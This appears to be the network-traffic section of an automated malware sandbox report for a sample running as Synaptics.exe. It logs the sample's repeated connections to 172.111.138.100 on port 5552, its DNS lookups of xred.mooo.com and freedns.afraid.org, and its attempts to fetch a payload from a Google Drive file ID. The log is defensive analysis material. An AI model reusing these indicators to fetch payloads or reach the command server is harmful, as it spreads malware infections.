Dec 30, 2024 11:34:38.308090925 CET	443	49723	172.217.16.206	192.168.2.8
Dec 30, 2024 11:34:38.310462952 CET	49723	443	192.168.2.8	172.217.16.206
Dec 30, 2024 11:34:38.312124014 CET	49723	443	192.168.2.8	172.217.16.206
Dec 30, 2024 11:34:38.321403027 CET	49724	443	192.168.2.8	172.217.16.206
Dec 30, 2024 11:34:38.321434975 CET	443	49724	172.217.16.206	192.168.2.8
Dec 30, 2024 11:34:38.321784973 CET	443	49724	172.217.16.206	192.168.2.8
Dec 30, 2024 11:34:38.321862936 CET	49724	443	192.168.2.8	172.217.16.206
Dec 30, 2024 11:34:38.322882891 CET	49724	443	192.168.2.8	172.217.16.206
Dec 30, 2024 11:34:38.355340958 CET	443	49723	172.217.16.206	192.168.2.8
Dec 30, 2024 11:34:38.363337040 CET	443	49724	172.217.16.206	192.168.2.8
Dec 30, 2024 11:34:38.590842962 CET	443	49723	172.217.16.206	192.168.2.8
Dec 30, 2024 11:34:38.590929031 CET	49723	443	192.168.2.8	172.217.16.206
Dec 30, 2024 11:34:38.590965986 CET	443	49723	172.217.16.206	192.168.2.8
Dec 30, 2024 11:34:38.591037989 CET	49723	443	192.168.2.8	172.217.16.206
Dec 30, 2024 11:34:38.591842890 CET	443	49723	172.217.16.206	192.168.2.8
Dec 30, 2024 11:34:38.591892958 CET	443	49723	172.217.16.206	192.168.2.8
Dec 30, 2024 11:34:38.591918945 CET	49723	443	192.168.2.8	172.217.16.206
Dec 30, 2024 11:34:38.591989994 CET	49723	443	192.168.2.8	172.217.16.206
Dec 30, 2024 11:34:38.619260073 CET	443	49724	172.217.16.206	192.168.2.8
Dec 30, 2024 11:34:38.619343042 CET	49724	443	192.168.2.8	172.217.16.206
Dec 30, 2024 11:34:38.619369984 CET	443	49724	172.217.16.206	192.168.2.8
Dec 30, 2024 11:34:38.619682074 CET	49724	443	192.168.2.8	172.217.16.206
Dec 30, 2024 11:34:38.620536089 CET	443	49724	172.217.16.206	192.168.2.8
Dec 30, 2024 11:34:38.620574951 CET	443	49724	172.217.16.206	192.168.2.8
Dec 30, 2024 11:34:38.620605946 CET	49724	443	192.168.2.8	172.217.16.206
Dec 30, 2024 11:34:38.620656967 CET	49724	443	192.168.2.8	172.217.16.206
Dec 30, 2024 11:34:38.639085054 CET	443	49721	142.250.185.193	192.168.2.8
Dec 30, 2024 11:34:38.639136076 CET	443	49721	142.250.185.193	192.168.2.8
Dec 30, 2024 11:34:38.639164925 CET	49721	443	192.168.2.8	142.250.185.193
Dec 30, 2024 11:34:38.639194965 CET	443	49721	142.250.185.193	192.168.2.8
Dec 30, 2024 11:34:38.639223099 CET	49721	443	192.168.2.8	142.250.185.193
Dec 30, 2024 11:34:38.639245033 CET	443	49721	142.250.185.193	192.168.2.8
Dec 30, 2024 11:34:38.639642954 CET	49721	443	192.168.2.8	142.250.185.193
Dec 30, 2024 11:34:38.792079926 CET	443	49725	142.250.185.193	192.168.2.8
Dec 30, 2024 11:34:38.792139053 CET	443	49725	142.250.185.193	192.168.2.8
Dec 30, 2024 11:34:38.792170048 CET	49725	443	192.168.2.8	142.250.185.193
Dec 30, 2024 11:34:38.792184114 CET	443	49725	142.250.185.193	192.168.2.8
Dec 30, 2024 11:34:38.792212009 CET	49725	443	192.168.2.8	142.250.185.193
Dec 30, 2024 11:34:38.792260885 CET	443	49725	142.250.185.193	192.168.2.8
Dec 30, 2024 11:34:38.792296886 CET	49725	443	192.168.2.8	142.250.185.193
Dec 30, 2024 11:34:38.792555094 CET	49725	443	192.168.2.8	142.250.185.193
Dec 30, 2024 11:34:41.212524891 CET	49723	443	192.168.2.8	172.217.16.206
Dec 30, 2024 11:34:41.212557077 CET	443	49723	172.217.16.206	192.168.2.8
Dec 30, 2024 11:34:41.212703943 CET	49724	443	192.168.2.8	172.217.16.206
Dec 30, 2024 11:34:41.212743998 CET	443	49724	172.217.16.206	192.168.2.8
Dec 30, 2024 11:34:41.456415892 CET	49740	5552	192.168.2.8	172.111.138.100
Dec 30, 2024 11:34:41.461330891 CET	5552	49740	172.111.138.100	192.168.2.8
Dec 30, 2024 11:34:41.461431980 CET	49740	5552	192.168.2.8	172.111.138.100
Dec 30, 2024 11:34:41.461796045 CET	49740	5552	192.168.2.8	172.111.138.100
Dec 30, 2024 11:34:41.466593027 CET	5552	49740	172.111.138.100	192.168.2.8
Dec 30, 2024 11:34:43.394270897 CET	49721	443	192.168.2.8	142.250.185.193
Dec 30, 2024 11:34:43.394315004 CET	49715	80	192.168.2.8	69.42.215.252
Dec 30, 2024 11:34:43.394464016 CET	49725	443	192.168.2.8	142.250.185.193
Dec 30, 2024 11:34:43.975420952 CET	5552	49740	172.111.138.100	192.168.2.8
Dec 30, 2024 11:34:43.975548029 CET	49740	5552	192.168.2.8	172.111.138.100
Dec 30, 2024 11:34:43.996619940 CET	49740	5552	192.168.2.8	172.111.138.100
Dec 30, 2024 11:34:44.001621008 CET	5552	49740	172.111.138.100	192.168.2.8
Dec 30, 2024 11:34:50.549892902 CET	49742	5552	192.168.2.8	172.111.138.100
Dec 30, 2024 11:34:50.555013895 CET	5552	49742	172.111.138.100	192.168.2.8
Dec 30, 2024 11:34:50.555438995 CET	49742	5552	192.168.2.8	172.111.138.100
Dec 30, 2024 11:34:50.555737972 CET	49742	5552	192.168.2.8	172.111.138.100
Dec 30, 2024 11:34:50.560600042 CET	5552	49742	172.111.138.100	192.168.2.8
Dec 30, 2024 11:34:57.930707932 CET	5552	49742	172.111.138.100	192.168.2.8
Dec 30, 2024 11:34:57.934731007 CET	49742	5552	192.168.2.8	172.111.138.100
Dec 30, 2024 11:34:57.947597980 CET	49742	5552	192.168.2.8	172.111.138.100
Dec 30, 2024 11:34:57.952481031 CET	5552	49742	172.111.138.100	192.168.2.8
Dec 30, 2024 11:34:59.570019007 CET	49743	5552	192.168.2.8	172.111.138.100
Dec 30, 2024 11:34:59.575109005 CET	5552	49743	172.111.138.100	192.168.2.8
Dec 30, 2024 11:34:59.575191021 CET	49743	5552	192.168.2.8	172.111.138.100
Dec 30, 2024 11:34:59.575488091 CET	49743	5552	192.168.2.8	172.111.138.100
Dec 30, 2024 11:34:59.580393076 CET	5552	49743	172.111.138.100	192.168.2.8
Dec 30, 2024 11:35:01.718347073 CET	5552	49743	172.111.138.100	192.168.2.8
Dec 30, 2024 11:35:01.718436956 CET	49743	5552	192.168.2.8	172.111.138.100
Dec 30, 2024 11:35:01.758933067 CET	49743	5552	192.168.2.8	172.111.138.100
Dec 30, 2024 11:35:01.763838053 CET	5552	49743	172.111.138.100	192.168.2.8
Dec 30, 2024 11:35:08.609107018 CET	49744	5552	192.168.2.8	172.111.138.100
Dec 30, 2024 11:35:08.614136934 CET	5552	49744	172.111.138.100	192.168.2.8
Dec 30, 2024 11:35:08.614459038 CET	49744	5552	192.168.2.8	172.111.138.100
Dec 30, 2024 11:35:08.620830059 CET	49744	5552	192.168.2.8	172.111.138.100
Dec 30, 2024 11:35:08.625722885 CET	5552	49744	172.111.138.100	192.168.2.8
Dec 30, 2024 11:35:12.979609013 CET	5552	49744	172.111.138.100	192.168.2.8
Dec 30, 2024 11:35:12.979788065 CET	49744	5552	192.168.2.8	172.111.138.100
Dec 30, 2024 11:35:13.009566069 CET	49744	5552	192.168.2.8	172.111.138.100
Dec 30, 2024 11:35:13.014431953 CET	5552	49744	172.111.138.100	192.168.2.8
Dec 30, 2024 11:35:17.674894094 CET	49746	5552	192.168.2.8	172.111.138.100
Dec 30, 2024 11:35:17.679881096 CET	5552	49746	172.111.138.100	192.168.2.8
Dec 30, 2024 11:35:17.680093050 CET	49746	5552	192.168.2.8	172.111.138.100
Dec 30, 2024 11:35:17.680423975 CET	49746	5552	192.168.2.8	172.111.138.100
Dec 30, 2024 11:35:17.685219049 CET	5552	49746	172.111.138.100	192.168.2.8
Dec 30, 2024 11:35:20.195430994 CET	5552	49746	172.111.138.100	192.168.2.8
Dec 30, 2024 11:35:20.195491076 CET	49746	5552	192.168.2.8	172.111.138.100
Dec 30, 2024 11:35:20.242933989 CET	49746	5552	192.168.2.8	172.111.138.100
Dec 30, 2024 11:35:20.247793913 CET	5552	49746	172.111.138.100	192.168.2.8
Dec 30, 2024 11:35:26.759160995 CET	49747	5552	192.168.2.8	172.111.138.100
Dec 30, 2024 11:35:26.764102936 CET	5552	49747	172.111.138.100	192.168.2.8
Dec 30, 2024 11:35:26.764437914 CET	49747	5552	192.168.2.8	172.111.138.100
Dec 30, 2024 11:35:26.770725012 CET	49747	5552	192.168.2.8	172.111.138.100
Dec 30, 2024 11:35:26.775641918 CET	5552	49747	172.111.138.100	192.168.2.8
Dec 30, 2024 11:35:28.901511908 CET	5552	49747	172.111.138.100	192.168.2.8
Dec 30, 2024 11:35:28.901580095 CET	49747	5552	192.168.2.8	172.111.138.100
Dec 30, 2024 11:35:28.946635008 CET	49747	5552	192.168.2.8	172.111.138.100
Dec 30, 2024 11:35:28.951390028 CET	5552	49747	172.111.138.100	192.168.2.8
Dec 30, 2024 11:35:35.878783941 CET	49749	5552	192.168.2.8	172.111.138.100
Dec 30, 2024 11:35:35.883836031 CET	5552	49749	172.111.138.100	192.168.2.8
Dec 30, 2024 11:35:35.884424925 CET	49749	5552	192.168.2.8	172.111.138.100
Dec 30, 2024 11:35:35.884800911 CET	49749	5552	192.168.2.8	172.111.138.100
Dec 30, 2024 11:35:35.889565945 CET	5552	49749	172.111.138.100	192.168.2.8
Dec 30, 2024 11:35:43.244992018 CET	5552	49749	172.111.138.100	192.168.2.8
Dec 30, 2024 11:35:43.245054960 CET	49749	5552	192.168.2.8	172.111.138.100
Dec 30, 2024 11:35:43.305732012 CET	49749	5552	192.168.2.8	172.111.138.100
Dec 30, 2024 11:35:43.310664892 CET	5552	49749	172.111.138.100	192.168.2.8
Dec 30, 2024 11:35:44.888179064 CET	49752	5552	192.168.2.8	172.111.138.100
Dec 30, 2024 11:35:44.893074036 CET	5552	49752	172.111.138.100	192.168.2.8
Dec 30, 2024 11:35:44.893183947 CET	49752	5552	192.168.2.8	172.111.138.100
Dec 30, 2024 11:35:44.894680023 CET	49752	5552	192.168.2.8	172.111.138.100
Dec 30, 2024 11:35:44.899436951 CET	5552	49752	172.111.138.100	192.168.2.8
Dec 30, 2024 11:35:47.102834940 CET	5552	49752	172.111.138.100	192.168.2.8
Dec 30, 2024 11:35:47.106796026 CET	49752	5552	192.168.2.8	172.111.138.100
Dec 30, 2024 11:35:47.119904995 CET	49752	5552	192.168.2.8	172.111.138.100
Dec 30, 2024 11:35:47.124695063 CET	5552	49752	172.111.138.100	192.168.2.8
Dec 30, 2024 11:35:53.896313906 CET	49753	5552	192.168.2.8	172.111.138.100
Dec 30, 2024 11:35:53.901166916 CET	5552	49753	172.111.138.100	192.168.2.8
Dec 30, 2024 11:35:53.901271105 CET	49753	5552	192.168.2.8	172.111.138.100
Dec 30, 2024 11:35:53.901669025 CET	49753	5552	192.168.2.8	172.111.138.100
Dec 30, 2024 11:35:53.906449080 CET	5552	49753	172.111.138.100	192.168.2.8
Dec 30, 2024 11:35:58.281898022 CET	5552	49753	172.111.138.100	192.168.2.8
Dec 30, 2024 11:35:58.282021999 CET	49753	5552	192.168.2.8	172.111.138.100
Dec 30, 2024 11:35:58.291224003 CET	49753	5552	192.168.2.8	172.111.138.100
Dec 30, 2024 11:35:58.296061993 CET	5552	49753	172.111.138.100	192.168.2.8
Dec 30, 2024 11:36:02.961065054 CET	49754	5552	192.168.2.8	172.111.138.100
Dec 30, 2024 11:36:02.966006041 CET	5552	49754	172.111.138.100	192.168.2.8
Dec 30, 2024 11:36:02.968503952 CET	49754	5552	192.168.2.8	172.111.138.100
Dec 30, 2024 11:36:02.973448992 CET	49754	5552	192.168.2.8	172.111.138.100
Dec 30, 2024 11:36:02.978257895 CET	5552	49754	172.111.138.100	192.168.2.8
Dec 30, 2024 11:36:05.507683039 CET	5552	49754	172.111.138.100	192.168.2.8
Dec 30, 2024 11:36:05.507795095 CET	49754	5552	192.168.2.8	172.111.138.100
Dec 30, 2024 11:36:05.582288027 CET	49754	5552	192.168.2.8	172.111.138.100
Dec 30, 2024 11:36:05.587199926 CET	5552	49754	172.111.138.100	192.168.2.8
Dec 30, 2024 11:36:11.988013983 CET	49755	5552	192.168.2.8	172.111.138.100
Dec 30, 2024 11:36:11.992942095 CET	5552	49755	172.111.138.100	192.168.2.8
Dec 30, 2024 11:36:11.993031025 CET	49755	5552	192.168.2.8	172.111.138.100
Dec 30, 2024 11:36:11.993455887 CET	49755	5552	192.168.2.8	172.111.138.100
Dec 30, 2024 11:36:11.998225927 CET	5552	49755	172.111.138.100	192.168.2.8
Dec 30, 2024 11:36:14.161577940 CET	5552	49755	172.111.138.100	192.168.2.8
Dec 30, 2024 11:36:14.161669016 CET	49755	5552	192.168.2.8	172.111.138.100
Dec 30, 2024 11:36:14.182061911 CET	49755	5552	192.168.2.8	172.111.138.100
Dec 30, 2024 11:36:14.186853886 CET	5552	49755	172.111.138.100	192.168.2.8
Dec 30, 2024 11:36:21.065911055 CET	49756	5552	192.168.2.8	172.111.138.100
Dec 30, 2024 11:36:21.070867062 CET	5552	49756	172.111.138.100	192.168.2.8
Dec 30, 2024 11:36:21.070951939 CET	49756	5552	192.168.2.8	172.111.138.100
Dec 30, 2024 11:36:21.071387053 CET	49756	5552	192.168.2.8	172.111.138.100
Dec 30, 2024 11:36:21.076128960 CET	5552	49756	172.111.138.100	192.168.2.8
Dec 30, 2024 11:36:23.222141981 CET	5552	49756	172.111.138.100	192.168.2.8
Dec 30, 2024 11:36:23.222889900 CET	49756	5552	192.168.2.8	172.111.138.100
Dec 30, 2024 11:36:23.560424089 CET	49756	5552	192.168.2.8	172.111.138.100
Dec 30, 2024 11:36:23.565258980 CET	5552	49756	172.111.138.100	192.168.2.8

UDP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Dec 30, 2024 11:34:29.517596006 CET	55024	53	192.168.2.8	1.1.1.1
Dec 30, 2024 11:34:29.524151087 CET	53	55024	1.1.1.1	192.168.2.8
Dec 30, 2024 11:34:30.383749962 CET	63741	53	192.168.2.8	1.1.1.1
Dec 30, 2024 11:34:30.391242981 CET	53	63741	1.1.1.1	192.168.2.8
Dec 30, 2024 11:34:30.394274950 CET	51713	53	192.168.2.8	1.1.1.1
Dec 30, 2024 11:34:30.402133942 CET	53	51713	1.1.1.1	192.168.2.8
Dec 30, 2024 11:34:30.573944092 CET	62776	53	192.168.2.8	1.1.1.1
Dec 30, 2024 11:34:30.581588030 CET	53	62776	1.1.1.1	192.168.2.8

DNS Queries

Timestamp	Source IP	Dest IP	Trans ID	OP Code	Name	Type	Class	DNS over HTTPS
Dec 30, 2024 11:34:29.517596006 CET	192.168.2.8	1.1.1.1	0xbd50	Standard query (0)	docs.google.com	A (IP address)	IN (0x0001)	false
Dec 30, 2024 11:34:30.383749962 CET	192.168.2.8	1.1.1.1	0x180a	Standard query (0)	xred.mooo.com	A (IP address)	IN (0x0001)	false
Dec 30, 2024 11:34:30.394274950 CET	192.168.2.8	1.1.1.1	0x885f	Standard query (0)	freedns.afraid.org	A (IP address)	IN (0x0001)	false
Dec 30, 2024 11:34:30.573944092 CET	192.168.2.8	1.1.1.1	0xea44	Standard query (0)	drive.usercontent.google.com	A (IP address)	IN (0x0001)	false

DNS Answers

Timestamp	Source IP	Dest IP	Trans ID	Reply Code	Name	CName	Address	Type	Class	DNS over HTTPS
Dec 30, 2024 11:34:29.524151087 CET	1.1.1.1	192.168.2.8	0xbd50	No error (0)	docs.google.com		172.217.16.206	A (IP address)	IN (0x0001)	false
Dec 30, 2024 11:34:30.391242981 CET	1.1.1.1	192.168.2.8	0x180a	Name error (3)	xred.mooo.com	none	none	A (IP address)	IN (0x0001)	false
Dec 30, 2024 11:34:30.402133942 CET	1.1.1.1	192.168.2.8	0x885f	No error (0)	freedns.afraid.org		69.42.215.252	A (IP address)	IN (0x0001)	false
Dec 30, 2024 11:34:30.581588030 CET	1.1.1.1	192.168.2.8	0xea44	No error (0)	drive.usercontent.google.com		142.250.185.193	A (IP address)	IN (0x0001)	false
Dec 30, 2024 11:35:31.694185019 CET	1.1.1.1	192.168.2.8	0xb247	No error (0)	shed.dual-low.s-part-0017.t-0009.t-msedge.net	s-part-0017.t-0009.t-msedge.net		CNAME (Canonical name)	IN (0x0001)	false
Dec 30, 2024 11:35:31.694185019 CET	1.1.1.1	192.168.2.8	0xb247	No error (0)	s-part-0017.t-0009.t-msedge.net		13.107.246.45	A (IP address)	IN (0x0001)	false

HTTP Request Dependency Graph

docs.google.com

drive.usercontent.google.com

freedns.afraid.org

HTTP Packets

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
0	192.168.2.8	49715	69.42.215.252	80	8036	C:\ProgramData\Synaptics\Synaptics.exe

Timestamp	Bytes transferred	Direction	Data
Dec 30, 2024 11:34:30.408147097 CET	154	OUT	GET /api/?action=getdyndns&sha=a30fa98efc092684e8d1c5cff797bcc613562978 HTTP/1.1 User-Agent: MyApp Host: freedns.afraid.org Cache-Control: no-cache
Dec 30, 2024 11:34:30.991075039 CET	243	IN	HTTP/1.1 200 OK Server: nginx Date: Mon, 30 Dec 2024 10:34:30 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Vary: Accept-Encoding X-Cache: MISS Data Raw: 31 66 0d 0a 45 52 52 4f 52 3a 20 43 6f 75 6c 64 20 6e 6f 74 20 61 75 74 68 65 6e 74 69 63 61 74 65 2e 0a 0d 0a 30 0d 0a 0d 0a Data Ascii: 1fERROR: Could not authenticate.0

HTTPS Proxied Packets

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
0	192.168.2.8	49712	172.217.16.206	443	8036	C:\ProgramData\Synaptics\Synaptics.exe

Timestamp	Bytes transferred	Direction	Data
2024-12-30 10:34:30 UTC	143	OUT	GET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1 User-Agent: Synaptics.exe Host: docs.google.com Cache-Control: no-cache
2024-12-30 10:34:30 UTC	1314	IN	HTTP/1.1 303 See Other Content-Type: application/binary Cache-Control: no-cache, no-store, max-age=0, must-revalidate Pragma: no-cache Expires: Mon, 01 Jan 1990 00:00:00 GMT Date: Mon, 30 Dec 2024 10:34:30 GMT Location: https://drive.usercontent.google.com/download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download Strict-Transport-Security: max-age=31536000 Cross-Origin-Opener-Policy: same-origin Content-Security-Policy: script-src 'report-sample' 'nonce-5YpfrkU6Skt1iC4MhFrs9Q' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self' Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport Permissions-Policy: ch-ua-arch=, ch-ua-bitness=, ch-ua-full-version=, ch-ua-full-version-list=, ch-ua-model=, ch-ua-wow64=, ch-ua-form-factors=, ch-ua-platform=, ch-ua-platform-version=* Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version Server: ESF Content-Length: 0 X-XSS-Protection: 0 X-Frame-Options: SAMEORIGIN X-Content-Type-Options: nosniff Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000 Connection: close

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
1	192.168.2.8	49711	172.217.16.206	443	8036	C:\ProgramData\Synaptics\Synaptics.exe

Timestamp	Bytes transferred	Direction	Data
2024-12-30 10:34:30 UTC	143	OUT	GET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1 User-Agent: Synaptics.exe Host: docs.google.com Cache-Control: no-cache
2024-12-30 10:34:30 UTC	1314	IN	HTTP/1.1 303 See Other Content-Type: application/binary Cache-Control: no-cache, no-store, max-age=0, must-revalidate Pragma: no-cache Expires: Mon, 01 Jan 1990 00:00:00 GMT Date: Mon, 30 Dec 2024 10:34:30 GMT Location: https://drive.usercontent.google.com/download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download Strict-Transport-Security: max-age=31536000 Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version Content-Security-Policy: script-src 'report-sample' 'nonce-HsfcgZAIKLBjc3mqGcCEgA' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self' Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport Permissions-Policy: ch-ua-arch=, ch-ua-bitness=, ch-ua-full-version=, ch-ua-full-version-list=, ch-ua-model=, ch-ua-wow64=, ch-ua-form-factors=, ch-ua-platform=, ch-ua-platform-version=* Cross-Origin-Opener-Policy: same-origin Server: ESF Content-Length: 0 X-XSS-Protection: 0 X-Frame-Options: SAMEORIGIN X-Content-Type-Options: nosniff Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000 Connection: close

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
2	192.168.2.8	49719	142.250.185.193	443	8036	C:\ProgramData\Synaptics\Synaptics.exe

Timestamp	Bytes transferred	Direction	Data
2024-12-30 10:34:31 UTC	186	OUT	GET /download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1 User-Agent: Synaptics.exe Cache-Control: no-cache Host: drive.usercontent.google.com Connection: Keep-Alive
2024-12-30 10:34:31 UTC	1601	IN	HTTP/1.1 404 Not Found X-GUploader-UploadID: AFiumC7Xd3_EMkfUx_20vx6MfwG2icaDFhALM4aQMyz5JJoKY2xxg-QTEFjY6pGG9gUooI2KuwvanQM Content-Type: text/html; charset=utf-8 Cache-Control: no-cache, no-store, max-age=0, must-revalidate Pragma: no-cache Expires: Mon, 01 Jan 1990 00:00:00 GMT Date: Mon, 30 Dec 2024 10:34:31 GMT P3P: CP="This is not a P3P policy! See g.co/p3phelp for more info." Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version Content-Security-Policy: script-src 'report-sample' 'nonce-5w9UjrPxoPLcZp8oVXg14w' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self' Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport Permissions-Policy: ch-ua-arch=, ch-ua-bitness=, ch-ua-full-version=, ch-ua-full-version-list=, ch-ua-model=, ch-ua-wow64=, ch-ua-form-factors=, ch-ua-platform=, ch-ua-platform-version=* Cross-Origin-Opener-Policy: same-origin Content-Length: 1652 Server: UploadServer Set-Cookie: NID=520=b1T8znPmh3zSMqQEaToyoyRR9X7BvTrQG4NcFjWxcs5T5xI3izk4l5pYgmo3LnBbUuh724lxK41R0ljONN_39-P4Okj2pNHYDUcv4mYcXn-23pqVqy7cjDrErXAy4iNrt2dW3TbnBbmAIj_7BLQGQmvnSpM5VdzQNxSbC-2fZwUqd-RZQ6y5YrY; expires=Tue, 01-Jul-2025 10:34:31 GMT; path=/; domain=.google.com; HttpOnly Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000 Content-Security-Policy: sandbox allow-scripts Connection: close
2024-12-30 10:34:31 UTC	1601	IN	Data Raw: 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 20 64 69 72 3d 6c 74 72 3e 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 3e 3c 6d 65 74 61 20 6e 61 6d 65 3d 76 69 65 77 70 6f 72 74 20 63 6f 6e 74 65 6e 74 3d 22 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 6d 69 6e 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2c 20 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 3c 74 69 74 6c 65 3e 45 72 72 6f 72 20 34 30 34 20 28 4e 6f 74 20 46 6f 75 6e 64 29 21 21 31 3c 2f 74 69 74 6c 65 3e 3c 73 74 79 6c 65 20 6e 6f 6e 63 65 3d 22 37 6a 50 34 33 43 71 68 45 77 62 79 43 35 56 61 4c 66 6a 74 6e 77 22 3e 2a 7b 6d 61 72 67 69 6e 3a 30 3b 70 61 64 64 69 6e 67 3a 30 7d 68 74 6d 6c 2c 63 6f 64 65 7b 66 6f 6e 74 3a 31 35 70 78 2f 32 32 70 78 20 61 72 69 61 6c Data Ascii: <html lang="en" dir=ltr><meta charset=utf-8><meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"><title>Error 404 (Not Found)!!1</title><style nonce="7jP43CqhEwbyC5VaLfjtnw">*{margin:0;padding:0}html,code{font:15px/22px arial
2024-12-30 10:34:31 UTC	51	IN	Data Raw: 68 69 73 20 73 65 72 76 65 72 2e 20 3c 69 6e 73 3e 54 68 61 74 e2 80 99 73 20 61 6c 6c 20 77 65 20 6b 6e 6f 77 2e 3c 2f 69 6e 73 3e 3c 2f 6d 61 69 6e 3e Data Ascii: his server. <ins>Thats all we know.</ins></main>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
3	192.168.2.8	49718	142.250.185.193	443	8036	C:\ProgramData\Synaptics\Synaptics.exe

Timestamp	Bytes transferred	Direction	Data
2024-12-30 10:34:31 UTC	186	OUT	GET /download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1 User-Agent: Synaptics.exe Cache-Control: no-cache Host: drive.usercontent.google.com Connection: Keep-Alive
2024-12-30 10:34:31 UTC	1601	IN	HTTP/1.1 404 Not Found X-GUploader-UploadID: AFiumC4mllYNGJPAIPIbtLCcv8_ugLJ2jVzO3XbiV-I7ETyrZ4MDatLmkmhrurGmooaW-etctaRYLXo Content-Type: text/html; charset=utf-8 Cache-Control: no-cache, no-store, max-age=0, must-revalidate Pragma: no-cache Expires: Mon, 01 Jan 1990 00:00:00 GMT Date: Mon, 30 Dec 2024 10:34:31 GMT P3P: CP="This is not a P3P policy! See g.co/p3phelp for more info." Content-Security-Policy: script-src 'report-sample' 'nonce-SdsENuDFnIx-R_ESttZWeA' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self' Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport Permissions-Policy: ch-ua-arch=, ch-ua-bitness=, ch-ua-full-version=, ch-ua-full-version-list=, ch-ua-model=, ch-ua-wow64=, ch-ua-form-factors=, ch-ua-platform=, ch-ua-platform-version=* Cross-Origin-Opener-Policy: same-origin Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version Content-Length: 1652 Server: UploadServer Set-Cookie: NID=520=Ped9FFu77ZILljDRdPx4jmMXgH_9clhvCrKcOs0vHo5Wh5NQRqtD2bTclKsZHpXc_yNTCnedWDYMKz3uCDArCyXwnKDw6vH-8GIIWrExz2AkW205gWJXFurdY0IJGp63ZylB0bEx3aie6cdBXZS-_R3SSHM6X3X9WwZL56Wjt5UdLiU7-iFR_yg; expires=Tue, 01-Jul-2025 10:34:31 GMT; path=/; domain=.google.com; HttpOnly Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000 Content-Security-Policy: sandbox allow-scripts Connection: close
2024-12-30 10:34:31 UTC	1601	IN	Data Raw: 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 20 64 69 72 3d 6c 74 72 3e 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 3e 3c 6d 65 74 61 20 6e 61 6d 65 3d 76 69 65 77 70 6f 72 74 20 63 6f 6e 74 65 6e 74 3d 22 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 6d 69 6e 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2c 20 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 3c 74 69 74 6c 65 3e 45 72 72 6f 72 20 34 30 34 20 28 4e 6f 74 20 46 6f 75 6e 64 29 21 21 31 3c 2f 74 69 74 6c 65 3e 3c 73 74 79 6c 65 20 6e 6f 6e 63 65 3d 22 30 74 6d 37 37 70 77 37 39 56 49 37 64 76 50 38 52 63 74 6c 51 67 22 3e 2a 7b 6d 61 72 67 69 6e 3a 30 3b 70 61 64 64 69 6e 67 3a 30 7d 68 74 6d 6c 2c 63 6f 64 65 7b 66 6f 6e 74 3a 31 35 70 78 2f 32 32 70 78 20 61 72 69 61 6c Data Ascii: <html lang="en" dir=ltr><meta charset=utf-8><meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"><title>Error 404 (Not Found)!!1</title><style nonce="0tm77pw79VI7dvP8RctlQg">*{margin:0;padding:0}html,code{font:15px/22px arial
